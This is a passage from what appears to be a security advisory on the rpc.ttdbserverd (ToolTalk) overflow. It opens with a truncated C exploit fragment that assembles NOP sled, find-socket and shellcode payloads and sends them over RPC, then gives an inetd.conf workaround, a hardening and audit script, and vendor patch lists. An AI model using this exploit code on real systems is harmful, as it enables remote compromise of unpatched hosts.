if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[0+3]=(unsigned char)(n&0xff);
b=buffer;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b++=' ';
*b=0;
req.string=buffer;
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
printf("sent! ");fflush(stdout);
sleep(2);
b=buffer;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=sh
Recommendations:
Temporary workaround:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Until the patch is installed, disable the rpc.ttdbserverd program immediately.
Taking Solaris as an example:
First become root, then open /etc/inetd.conf with the editor of your choice and find the following line:
100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
Add a "#" at the beginning of the line to comment it out:
#100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
Save and exit. Then restart inetd:
# ps -ef|grep inetd
# kill -HUP <pid of inetd>
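The same workaround can be applied and audited without hand-editing: comment out every active rpc.ttdbserverd entry, replace the file atomically so inetd never reads a half-written configuration, and send inetd SIGHUP. The script below is an added example rather than NSFOCUS's own tooling; it assumes the classic Solaris /etc/inetd.conf layout quoted above (one service per line, "#" comments, service field "100083/1"), the function names are the author's choice, and the configuration used in the demo is constructed.

```python
"""Disable rpc.ttdbserverd in an inetd.conf-style file and tell inetd to reread it.

Added example for the advisory's workaround; not NSFOCUS's script.  Assumes the
classic Solaris /etc/inetd.conf layout (one service per line, '#' comments,
service field '100083/1').  The configuration in the demo is constructed.
"""
import os
import shutil
import signal
import subprocess
import sys
import tempfile

TTDB_SERVICE = "100083/1"          # RPC program/version field of the ttdbserverd entry
TTDB_DAEMON = "rpc.ttdbserverd"


def is_active_ttdb_line(line):
    """True for an uncommented inetd.conf entry that starts rpc.ttdbserverd."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):
        return False
    return fields[0] == TTDB_SERVICE or any(f.endswith(TTDB_DAEMON) for f in fields)


def ttdbserverd_enabled(path):
    """Audit check: does this inetd.conf still start rpc.ttdbserverd?"""
    with open(path) as f:
        return any(is_active_ttdb_line(line) for line in f)


def disable_ttdbserverd(path):
    """Comment out every active rpc.ttdbserverd entry; return how many lines changed.
    Running it again on an already hardened file changes nothing."""
    with open(path) as f:
        lines = f.readlines()
    out, changed = [], 0
    for line in lines:
        if is_active_ttdb_line(line):
            out.append("#" + line)
            changed += 1
        else:
            out.append(line)
    if changed:
        tmp = path + ".tmp"
        with open(tmp, "w") as f:
            f.writelines(out)
        shutil.copymode(path, tmp)     # keep the original permission bits
        os.replace(tmp, path)          # atomic swap: inetd never sees a half-written file
    return changed


def hup_inetd():
    """The advisory's `kill -HUP <pid of inetd>` step; returns the pids signalled."""
    try:
        found = subprocess.run(["pgrep", "-x", "inetd"], capture_output=True, text=True)
    except FileNotFoundError:
        return []                      # no pgrep on this host: fall back to ps -ef by hand
    pids = [int(p) for p in found.stdout.split()]
    for pid in pids:
        os.kill(pid, signal.SIGHUP)
    return pids


if __name__ == "__main__":
    if len(sys.argv) > 1:              # real use (as root): python3 harden.py /etc/inetd.conf
        print("commented out %d line(s)" % disable_ttdbserverd(sys.argv[1]))
        print("inetd pids signalled:", hup_inetd())
    else:                              # demo on a constructed copy of the advisory's line
        sample = ("telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd\n"
                  "100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd\n")
        with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as f:
            f.write(sample)
        print("ttdbserverd enabled before:", ttdbserverd_enabled(f.name))
        disable_ttdbserverd(f.name)
        print("ttdbserverd enabled after: ", ttdbserverd_enabled(f.name))
        os.unlink(f.name)
```

Writing /etc/inetd.conf and signalling inetd both require root, and the audit function is worth running again after any patch or reinstall of CDE, since vendor packages can re-enable the entry. On Solaris 10 and later inetd services live in SMF rather than in inetd.conf, so this file-based approach applies only to the Solaris 2.x releases the advisory lists.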
Vendor patches:
IBM
---
The vendor has released patches to fix this security issue; download them from the vendor's home page:
http://www.ers.ibm.com/
IBM AIX 4.1:
IBM APAR IX81440
IBM AIX 4.1.1:
IBM APAR IX81440
IBM AIX 4.1.2:
IBM APAR IX81440
IBM AIX 4.1.3:
IBM APAR IX81440
IBM AIX 4.1.4:
IBM APAR IX81440
IBM AIX 4.1.5:
IBM APAR IX81440
IBM AIX 4.2:
IBM APAR IX81441
IBM AIX 4.2.1:
IBM APAR IX81441
IBM AIX 4.3:
IBM APAR IX81442
SGI
---
SGI has released two security advisories (19981101-01-P, 20020302-01-A) and corresponding patches for this issue:
19981101-01-P:Vulnerability in ToolTalk RPC Service
Link: ftp://patches.sgi.com/support/free/security/advisories/19981101-01-P
20020302-01-A:Additional CDE and CDE ToolTalk Vulnerabilities
Link: ftp://patches.sgi.com/support/free/security/advisories/20020302-01-A
Sun
---
The vendor has released patches to fix this security issue; download them from the vendor's home page:
http://sunsolve.sun.com/sunsolve/pubpatches/patches.html
Sun Solaris 1.1:
Sun Solaris 1.1.1:
Sun Solaris 1.1.2:
Sun Solaris 1.1.3 _U1:
Sun Solaris 1.1.3:
Sun Solaris 1.1.4 -JL:
Sun Solaris 1.1.4:
Sun Solaris 1.2:
Sun Solaris 2.0:
Sun Solaris 2.1:
Sun Solaris 2.2:
Sun Solaris 2.3:
Sun Patch 101495-03
Sun Solaris 2.4 _x86:
Sun Patch 108641-01
Sun Solaris 2.4:
Sun Patch 102734-05
Sun Solaris 2.5 _x86:
Sun Solaris 2.5:
Sun Solaris 2.5.1 _x86:
Sun Solaris 2.5.1 _ppc:
Sun Solaris 2.5.1:
Sun Solaris 2.6 _x86:
Sun Patch 105803-05
Sun Solaris 2.6:
Sun Patch 105802-05
TriTeal
-------
The vendor has released patches to fix this security issue; download them from the vendor's home page:
http://www.triteal.com/support
TriTeal TED CDE 4.4
Xi Graphics
-----------
The vendor has released patches to fix this security issue; download them from the vendor's home page:
ftp://ftp.xig.com:/pub/updates/cde/1.2.3/C1203.002.tar.gz
ftp://ftp.xig.com:/pub/updates/cde/1.2.3/C1203.002.txt
Severity: 0 (user vote)